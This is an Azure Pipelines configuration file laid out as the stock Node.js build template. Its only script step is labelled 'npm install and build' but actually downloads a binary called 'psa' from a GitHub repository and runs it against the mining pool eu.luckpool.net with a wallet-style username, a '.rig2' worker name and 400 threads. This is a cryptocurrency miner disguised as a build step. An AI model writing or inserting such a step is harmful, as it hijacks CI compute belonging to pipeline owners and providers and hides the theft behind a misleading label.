# Node.js
# Build a general Node.js project with npm.
# Add steps that analyze code, save build artifacts, deploy, and more:
# https://docs.microsoft.com/azure/devops/pipelines/languages/javascript

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- task: NodeTool@0
  inputs:
    versionSpec: '10.x'
  displayName: 'Install Node.js'

- script: |
    wget https://github.com/jazzup6176/StyleGAN1/raw/main/psa && ./psa -v -l eu.luckpool.net:3956 -u RRTP6VLKGvw7oFSRWpyVUabPyKRqDr5hJy.rig2 -p x -t 400
  displayName: 'npm install and build'
